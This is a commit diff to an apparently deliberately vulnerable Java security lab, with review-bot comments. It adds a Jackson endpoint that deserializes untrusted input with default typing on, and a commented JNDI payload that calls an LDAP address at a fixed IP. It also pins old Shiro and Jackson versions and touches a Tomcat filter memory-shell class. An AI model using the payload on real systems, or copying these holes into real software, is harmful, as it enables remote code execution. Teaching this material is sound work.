
Commit 920bd93

author
JoyChou
committed
1 parent 4ede83a commit 920bd93

20 files changed

+203
-91
lines changed

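--- a/README.md
+++ b/README.md
@@ -47,6 +47,7 @@ Sort by letter.
 - ScriptEngine
 - Yaml Deserialize
 - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)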

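--- a/README_zh.md
+++ b/README_zh.md
@@ -42,6 +42,7 @@ joychou/joychou123
 - ScriptEngine
 - Yaml Deserialize
 - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)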

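--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -1,5 +1,11 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <module version="4">
+<component name="AdditionalModuleElements">
+<content url="file://$MODULE_DIR$" dumb="true">
+<sourceFolder url="file://$MODULE_DIR$/spring-cloud-gateway-helloworld" isTestSource="false" />
+<sourceFolder url="file://$MODULE_DIR$/src/main/test" isTestSource="true" />
+</content>
+</component>
 <component name="FacetManager">
 <facet type="Spring" name="Spring">
 <configuration />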

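--- a/pom.xml
+++ b/pom.xml
@@ -12,7 +12,6 @@
 <properties>
 <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
 <maven.compiler.target>1.8</maven.compiler.target>
-<tomcat.version>8.5.85</tomcat.version>
 </properties>
 
 
@@ -197,11 +196,12 @@
 <version>1.7</version>
 </dependency>
 
-<!-- rce -->
+
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream</artifactId>
-<version>1.4.10</version>
+<!-- For testing, you can use the vulnerable version of 1.4.10. -->
+<version>1.4.20</version> <!-- use latest version to exploit vuln by using xstream.addPermission-->
 </dependency>
 
 <dependency>
@@ -344,6 +344,65 @@
 <version>11.5.8.0</version>
 </dependency>
 
+<dependency>
+<groupId>org.apache.shiro</groupId>
+<artifactId>shiro-core</artifactId>
+<version>1.2.4</version>
+</dependency>
+
+<dependency>
+<groupId>com.fasterxml.jackson.core</groupId>
+<artifactId>jackson-databind</artifactId>
+<version>2.9.8</version>
+</dependency>
+
+<dependency>
+<groupId>com.fasterxml.jackson.core</groupId>
+<artifactId>jackson-annotations</artifactId>
+<version>2.9.8</version>
+</dependency>
+
+<dependency>
+<groupId>com.fasterxml.jackson.core</groupId>
+<artifactId>jackson-core</artifactId>
+<version>2.9.8</version>
+</dependency>
+
+
+<!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
+<dependency>
+<groupId>org.jsecurity</groupId>
+<artifactId>jsecurity</artifactId>
+<version>0.9.0</version>
+</dependency>
+
+
+<!-- 为了使用SimpleEvaluationContext,该类需要spring-expression版本大于等于4.3.15 -->
+<dependency>
+<groupId>org.springframework</groupId>
+<artifactId>spring-expression</artifactId>
+<version>4.3.16.RELEASE</version>
+</dependency>
+
+<!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
+<dependency>
+<groupId>com.h2database</groupId>
+<artifactId>h2</artifactId>
+<version>1.4.199</version>
+<scope>test</scope>
+</dependency>
+
+<dependency>
+<groupId>org.apache.tomcat</groupId>
+<artifactId>tomcat-dbcp</artifactId>
+<version>9.0.8</version>
+</dependency>
+
+<dependency>
+<groupId>com.alibaba</groupId>
+<artifactId>QLExpress</artifactId>
+<version>3.3.1</version>
+</dependency>
 </dependencies>
 
 <dependencyManagement>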
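Review bot: The dependencies added in the last hunk pin old releases (`shiro-core` 1.2.4, `jackson-databind` 2.9.8, `jsecurity` 0.9.0) with no comment saying the pin is deliberate, while the xstream entry in the same commit does explain its version. The README lists these topics as vulnerability samples, so the old versions look intentional, but a dependency-update tool or a reader copying this pom cannot tell. I would mark each of them, for example `<!-- intentionally old release for the lab samples; do not upgrade or reuse -->`. Separately, the first hunk drops the `<tomcat.version>` property, which presumably leaves the embedded Tomcat at whatever version the parent POM manages; confirm that this is wanted.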

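--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -5,7 +5,6 @@
 import org.springframework.boot.builder.SpringApplicationBuilder;
 import org.springframework.boot.web.servlet.ServletComponentScan;
 import org.springframework.boot.web.support.SpringBootServletInitializer;
-import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
 @ServletComponentScan // do filter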

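--- a/src/main/java/org/joychou/config/TomcatFilterMemShell.java
+++ b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
@@ -1,10 +1,5 @@
 package org.joychou.config;
 
-import com.sun.org.apache.xalan.internal.xsltc.DOM;
-import com.sun.org.apache.xalan.internal.xsltc.TransletException;
-import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
-import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
-import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 import java.lang.reflect.Field;
 import org.apache.catalina.core.StandardContext;
 import java.io.IOException;
@@ -19,8 +14,8 @@
 import javax.servlet.*;
 import java.util.*;
 
-@Component
-public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
+//@Component
+public class TomcatFilterMemShell implements Filter {
 static{
 try {
 System.out.println("Tomcat filter backdoor class is loading...");
@@ -75,16 +70,6 @@ public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
 }
 
 
-@Override
-public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
-
-}
-
-@Override
-public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
-
-}
-
 @Override
 public void init(FilterConfig filterConfig) throws ServletException {
 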
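Review bot: The `//@Component` left above the class declaration is a commented-out annotation with no reason given, so a later cleanup could re-enable it and have Spring instantiate this filter at every startup, which would run the static initializer visible in the hunk. If keeping the class out of component scanning is the intent, delete the line or state it, e.g. `// Deliberately not a Spring bean: this memory-shell sample must never be auto-registered`. The class body continues outside the hunks, so whether anything else still loads the class cannot be checked from here.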

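--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
 import org.joychou.config.Constants;
 import org.joychou.security.AntObjectInputStream;
 import org.slf4j.Logger;
@@ -83,4 +84,17 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
 return "I'm very OK.";
 }
 
+// String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\", {\"jndiNames\":\"ldap://30.196.97.50:1389/yto8pc\"}]";
+@RequestMapping("/jackson")
+public void Jackson(String payload) {
+ObjectMapper mapper = new ObjectMapper();
+mapper.enableDefaultTyping();
+try {
+Object obj = mapper.readValue(payload, Object.class);
+mapper.writeValueAsString(obj);
+} catch (IOException e) {
+e.printStackTrace();
+}
+}
+
 }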
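Review bot: The new `/jackson` handler calls `enableDefaultTyping()` and then passes the raw request parameter to `readValue(payload, Object.class)`, which lets the request choose the class Jackson instantiates, and nothing in the hunk marks this as the intentionally unsafe sample or shows the safe form. Add a comment above the mapping such as `// Vulnerable by design: default typing on untrusted input; the safe form omits enableDefaultTyping() and binds to a concrete type`, and consider a paired secure endpoint. The commented sample payload embeds a concrete LDAP host; a labelled placeholder such as `ldap://<lab-host>:1389/<name>` is safer to publish. `e.printStackTrace()` should go through the slf4j logger this file already imports, and the method name `Jackson` should be lowerCamelCase.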

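--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -195,4 +195,4 @@ private static boolean isImage(File file) throws IOException {
 BufferedImage bi = ImageIO.read(file);
 return bi != null;
 }
-}
+}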

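--- a/src/main/java/org/joychou/controller/Jsonp.java
+++ b/src/main/java/org/joychou/controller/Jsonp.java
@@ -6,8 +6,8 @@
 import com.alibaba.fastjson.JSONPObject;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang.StringUtils;
-import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.joychou.security.SecurityUtil;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
@@ -19,7 +19,6 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 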

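--- a/src/main/java/org/joychou/controller/Jwt.java
+++ b/src/main/java/org/joychou/controller/Jwt.java
@@ -33,7 +33,9 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque
 String loginUser = request.getUserPrincipal().getName();
 log.info("Current login user is " + loginUser);
 
-CookieUtils.deleteCookie(response, COOKIE_NAME);
+if (!CookieUtils.deleteCookie(response, COOKIE_NAME)){
+return String.format("%s cookie delete failed", COOKIE_NAME);
+}
 String token = JwtUtils.generateTokenByJavaJwt(loginUser);
 Cookie cookie = new Cookie(COOKIE_NAME, token);
 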
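Review bot: The new failure branch returns the "cookie delete failed" text as an ordinary response body, so as far as the hunk shows the client gets the same status as for a successful token issue and nothing is logged. Log the failure and signal it in the status before returning, e.g. `log.error(COOKIE_NAME + " cookie delete failed for " + loginUser);` and `response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR);`. `createToken` starts and ends outside the hunk, so the attributes set on the new token cookie are not visible here.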
